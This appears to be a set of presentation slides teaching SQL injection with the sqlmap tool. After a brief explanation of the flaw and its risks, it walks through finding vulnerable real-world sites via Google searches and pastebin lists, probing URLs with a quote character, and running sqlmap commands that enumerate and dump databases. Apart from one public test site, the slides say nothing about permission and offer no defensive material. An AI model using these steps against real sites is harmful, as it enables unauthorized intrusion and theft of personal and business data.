SQL Injection

What is SQL Injection

• Injecting SQL code in database applications to dump/return the database.

How it works?

•For example:

1. Websites takes user input from a form
2. This user input is used literally in the construction of a SQL query submitted to a database.
3. User sends SQL commands instead of the normal “input” through that form.
4. SQL query responds hence successful Injection performed.

SQL Injection Risks

• Adding new data to the database
• Example eCommerce website selling incorrect items etc
• Modifying data
• Examples
• eCommerce with super discounted items
• Accessing Personal data on social networking websites
• Gaining Admin Access
• Server/ftp
• Website
• Database

How to do?

•Learn SQL! (pro way)

•Or

•Use prebuilt programs (SQLmap)

First Step: Finding a Vulnerable Website

• Many ways to do this
• Easiest way is to go on google.com and in search type
  • Index.php?’
  • Sql injectable websites pastebin 2015
• At the end of the URL, put a ‘ and see if gives you any SQL errors/warning
  • http://www.site.com/index.php?id=51’ 

Loading up SQLmap

• Requires Python on your computer
• Runs on windows/mac/linux
• **If using Kali Linux you don’t need to cd to path of your sqlmap program**
• Windows Users need to cd to the path of the sqlmap folder using cmd.

Loading up SQLmap

• git clone:
  • https://github.com/sqlmapproject/sqlmap.git
• Linux Server Access Using Putty/ssh:
  • cis-linux2.temple.edu
  • astro.temple.edu
• Website we will be injecting:
  • http://testphp.acunetix.com/listproducts.php?cat=1

Common SQLmap parameters

• -u: is for the URL
• --dbs : is the option to get the database list from the injectable website
• --tables : lists the tables in the SQL server
• --columns : gets columns of a table in the database
• --dump: dumps the database
• -D: specific database you want data from
• -T: specific table you want data from

SQLmap Commands

• $ python sqlmap.py -u "http://www.site.com/section.php?id=51"
• $ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" –dbs
• $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D “specific database parameter”
• $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D “specific database parameter” -T “specific tables”
• $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D “specific database parameter” -T “specific tables”

The dump of the database can be found at

• Linux: cd .sqlmap/
• Windows: inside your sqlmap program directory in “output” folder